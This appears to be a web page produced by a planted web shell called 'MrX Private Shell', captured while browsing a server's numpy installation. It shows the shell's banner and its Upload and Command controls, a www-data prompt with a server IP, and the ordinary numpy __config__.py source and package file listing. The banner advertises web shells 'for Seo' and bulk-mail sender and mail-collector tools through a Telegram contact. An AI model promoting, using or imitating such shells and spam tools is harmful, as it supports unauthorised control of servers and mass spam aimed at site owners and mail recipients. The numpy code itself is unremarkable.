__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.60: ~ $
# This file is generated by numpy's build process
# It contains system_info results at the time of building this package.
from enum import Enum
from numpy._core._multiarray_umath import (
    __cpu_features__,
    __cpu_baseline__,
    __cpu_dispatch__,
)

__all__ = ["show_config"]
_built_with_meson = True


class DisplayModes(Enum):
    stdout = "stdout"
    dicts = "dicts"


def _cleanup(d):
    """
    Removes empty values in a `dict` recursively
    This ensures we remove values that Meson could not provide to CONFIG
    """
    if isinstance(d, dict):
        return {k: _cleanup(v) for k, v in d.items() if v and _cleanup(v)}
    else:
        return d


CONFIG = _cleanup(
    {
        "Compilers": {
            "c": {
                "name": "gcc",
                "linker": r"ld.bfd",
                "version": "14.2.0",
                "commands": r"cc",
                "args": r"-g, -O2, -Werror=implicit-function-declaration, -ffile-prefix-map=$BUILDDIR=., -fstack-protector-strong, -fstack-clash-protection, -Wformat, -Werror=format-security, -mbranch-protection=standard, -Wdate-time, -D_FORTIFY_SOURCE=2",
                "linker args": r"-Wl,-z,relro, -g, -O2, -Werror=implicit-function-declaration, -ffile-prefix-map=$BUILDDIR=., -fstack-protector-strong, -fstack-clash-protection, -Wformat, -Werror=format-security, -mbranch-protection=standard, -Wdate-time, -D_FORTIFY_SOURCE=2",
            },
            "cython": {
                "name": "cython",
                "linker": r"cython",
                "version": "3.0.11",
                "commands": r"cython",
                "args": r"",
                "linker args": r"",
            },
            "c++": {
                "name": "gcc",
                "linker": r"ld.bfd",
                "version": "14.2.0",
                "commands": r"c++",
                "args": r"-g, -O2, -ffile-prefix-map=$BUILDDIR=., -fstack-protector-strong, -fstack-clash-protection, -Wformat, -Werror=format-security, -mbranch-protection=standard, -Wdate-time, -D_FORTIFY_SOURCE=2",
                "linker args": r"-Wl,-z,relro, -g, -O2, -ffile-prefix-map=$BUILDDIR=., -fstack-protector-strong, -fstack-clash-protection, -Wformat, -Werror=format-security, -mbranch-protection=standard, -Wdate-time, -D_FORTIFY_SOURCE=2",
            },
        },
        "Machine Information": {
            "host": {
                "cpu": "aarch64",
                "family": "aarch64",
                "endian": "little",
                "system": "linux",
            },
            "build": {
                "cpu": "aarch64",
                "family": "aarch64",
                "endian": "little",
                "system": "linux",
            },
            "cross-compiled": bool("False".lower().replace("false", "")),
        },
        "Build Dependencies": {
            "blas": {
                "name": "blas",
                "found": bool("True".lower().replace("false", "")),
                "version": "3.12.1",
                "detection method": "pkgconfig",
                "include directory": r"/usr/include/aarch64-linux-gnu",
                "lib directory": r"/usr/lib/aarch64-linux-gnu",
                "openblas configuration": r"unknown",
                "pc file directory": r"/usr/lib/aarch64-linux-gnu/pkgconfig",
            },
            "lapack": {
                "name": "lapack",
                "found": bool("True".lower().replace("false", "")),
                "version": "3.12.1",
                "detection method": "pkgconfig",
                "include directory": r"/usr/include/aarch64-linux-gnu",
                "lib directory": r"/usr/lib/aarch64-linux-gnu",
                "openblas configuration": r"unknown",
                "pc file directory": r"/usr/lib/aarch64-linux-gnu/pkgconfig",
            },
        },
        "SIMD Extensions": {
            "baseline": __cpu_baseline__,
            "found": [
                feature for feature in __cpu_dispatch__ if __cpu_features__[feature]
            ],
            "not found": [
                feature for feature in __cpu_dispatch__ if not __cpu_features__[feature]
            ],
        },
    }
)


def _check_pyyaml():
    import yaml

    return yaml


def show(mode=DisplayModes.stdout.value):
    """
    Show libraries and system information on which NumPy was built
    and is being used

    Parameters
    ----------
    mode : {`'stdout'`, `'dicts'`}, optional.
        Indicates how to display the config information.
        `'stdout'` prints to console, `'dicts'` returns a dictionary
        of the configuration.

    Returns
    -------
    out : {`dict`, `None`}
        If mode is `'dicts'`, a dict is returned, else None

    See Also
    --------
    get_include : Returns the directory containing NumPy C
                  header files.

    Notes
    -----
    1. The `'stdout'` mode will give more readable
       output if ``pyyaml`` is installed

    """
    if mode == DisplayModes.stdout.value:
        try:  # Non-standard library, check import
            yaml = _check_pyyaml()

            print(yaml.dump(CONFIG))
        except ModuleNotFoundError:
            import warnings
            import json

            warnings.warn("Install `pyyaml` for better output", stacklevel=1)
            print(json.dumps(CONFIG, indent=2))
    elif mode == DisplayModes.dicts.value:
        return CONFIG
    else:
        raise AttributeError(
            f"Invalid `mode`, use one of: {', '.join([e.value for e in DisplayModes])}"
        )


def show_config(mode=DisplayModes.stdout.value):
    return show(mode)


show_config.__doc__ = show.__doc__
show_config.__module__ = "numpy"

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
_core Folder 0755
_pyinstaller Folder 0755
_typing Folder 0755
_utils Folder 0755
char Folder 0755
compat Folder 0755
core Folder 0755
doc Folder 0755
f2py Folder 0755
fft Folder 0755
lib Folder 0755
linalg Folder 0755
ma Folder 0755
matrixlib Folder 0755
polynomial Folder 0755
random Folder 0755
rec Folder 0755
strings Folder 0755
testing Folder 0755
tests Folder 0755
typing Folder 0755
__config__.py File 5.55 KB 0644
__config__.pyi File 2.32 KB 0644
__init__.cython-30.pxd File 45.33 KB 0644
__init__.pxd File 42.04 KB 0644
__init__.py File 21.63 KB 0644
__init__.pyi File 207.05 KB 0644
_array_api_info.py File 10.14 KB 0644
_array_api_info.pyi File 4.78 KB 0644
_configtool.py File 1007 B 0644
_configtool.pyi File 24 B 0644
_distributor_init.py File 407 B 0644
_distributor_init.pyi File 27 B 0644
_expired_attrs_2_0.py File 3.81 KB 0644
_expired_attrs_2_0.pyi File 1.24 KB 0644
_globals.py File 3.02 KB 0644
_globals.pyi File 280 B 0644
_pytesttester.py File 6.18 KB 0644
_pytesttester.pyi File 497 B 0644
conftest.py File 8.51 KB 0644
ctypeslib.py File 18.39 KB 0644
ctypeslib.pyi File 7.9 KB 0644
dtypes.py File 1.28 KB 0644
dtypes.pyi File 14.82 KB 0644
exceptions.py File 7.65 KB 0644
exceptions.pyi File 751 B 0644
matlib.py File 10.41 KB 0644
matlib.pyi File 9.4 KB 0644
py.typed File 0 B 0644
version.py File 293 B 0644
version.pyi File 388 B 0644
Filemanager